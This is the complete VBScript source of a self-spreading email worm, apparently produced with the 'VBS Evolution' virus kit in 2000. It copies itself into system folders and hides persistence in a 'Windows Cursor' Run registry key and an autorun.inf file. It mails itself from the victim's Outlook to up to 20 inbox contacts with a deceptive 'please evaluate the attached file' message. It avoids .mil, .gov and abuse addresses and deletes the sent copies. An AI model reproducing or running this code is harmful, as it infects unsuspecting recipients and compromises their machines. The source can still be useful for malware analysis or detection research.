' -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
'   YOu All Must Die!!!!! by Code Ripper
'   Generated by VBS Evolution on 05.29.2000
' -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

' Standard Header and Initialization
On Error Resume Next

Randomize

Dim shell, fso, daNet
Set shell = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
Set daNet = CreateObject("WScript.Network")

' Windows directory
sDir1 = fso.BuildPath(fso.GetSpecialFolder(0), "SJRKUFPE.VBS")
fso.CopyFile WScript.ScriptFullName, sDir1
' Windows\System directory
sDir2 = fso.BuildPath(fso.GetSpecialFolder(1), "JWKBLMLR.VBS")
fso.CopyFile WScript.ScriptFullName, sDir2
' Temp directory
sDir3 = fso.BuildPath(fso.GetSpecialFolder(2), "HVJHOIFW.VBS")
fso.CopyFile WScript.ScriptFullName, sDir3

sRun = "\Software\Microsoft\Windows\CurrentVersion\Run"

shell.RegWrite "HKCU" & sRun & "\Windows Cursor", "%WINDIR%\wscript.exe " & sDir1, "REG_EXPAND_SZ"
'c:\autorun.inf will be run everytime user browses C: from "My Computer"
Set Script = fso.CreateTextFile("c:\autorun.inf", True)
Script.WriteLine("[autorun]")
Script.WriteLine("open=" & sDir1)
Script.Close

' Initialize Outlook and MAPI
Set OutApp = CreateObject("Outlook.Application")
Set MapiName = OutApp.GetNameSpace("MAPI")

' Previously emailed dudes
sWinFile = fso.BuildPath(fso.GetSpecialFolder(0),"Windows.Exe")
If fso.FileExists(sWinFile) Then
  Set FileObj = fso.OpenTextFile(sWinFile, 1)
  DupeList = FileObj.ReadAll
  FileObj.Close
Else
  DupeList = ""
End If

' Total number of people we've emailed today
iTotal = 1

' Open up the INBOX
set MyFolder = MapiName.GetDefaultFolder(6)
Set MyItem = MyFolder.Items
' Variation of C's FindFirst/FindNext methods
set myMsg = MyItem.GetFirst

For each IDX in MyFolder.Items
'   Go ahead and reply to this message.  If contains a bad recipient,
'   or we've previously replied, we can always cancel later
  Set NewMail = myMsg.Reply


  i = InStr(LCase(NewMail.Recipients(1).Address), ".mil")
  j = InStr(LCase(NewMail.Recipients(1).Address), ".gov")
  k = InStr(LCase(NewMail.Recipients(1).Address), "admin")
  l = InStr(LCase(NewMail.Recipients(1).Address), "master")
  m = InStr(LCase(NewMail.Recipients(1).Address), "abuse")
'   A tab at the end of our subject marks us as being "already replied to"
  n = InStr(myMsg.Subject, Chr(9))
'   Make sure we didn't already email homeboy
  o = InStr(DupeList, NewMail.Recipients(1).Address)


  If i=0 and j=0 and k=0 and l=0 and m=0 and n=0 and o=0 Then
'     Add him to dupes
    DupeList = DupeList & "|" & NewMail.Recipients(1).Address
'     Duplicate the received email
    NewMail.Subject = myMsg.Subject
'     Minus any attachments
    While NewMail.Attachments.Count > 0
      NewMail.Attachments.Remove 1
    Wend
'     Add ourself
    NewMail.Attachments.Add WScript.ScriptFullName
    NewMail.Body = "Hi " & myMsg.SenderName & vbCrLf & _
    "Received your mail, and will send you a reply A.S.A.P." & vbCrLf & _
    "Until then, please evaluate the attached file" & _
    vbCrLf & vbCrLf & myMsg.Body
    NewMail.DeleteAfterSubmit = True
    NewMail.Send
'     Mark this message as "done" and save
    myMsg.Subject = myMsg.Subject & Chr(9)
    myMsg.Save
'     Don't email more than 20 people per cycle
    iTotal = iTotal + 1
    If iTotal > 20 Then
      Exit For
    End If
  else
'     User doesn't meet our requirements, cancel the reply
    NewMail.Delete
  end if

'   FindNext message
  Set myMsg = MyItem.GetNext
Next

' Write out our "previously emailed" addresses to a file for later use
Set FileObj = fso.CreateTextFile(sWinFile)
FileObj.Write DupeList
FileObj.Close

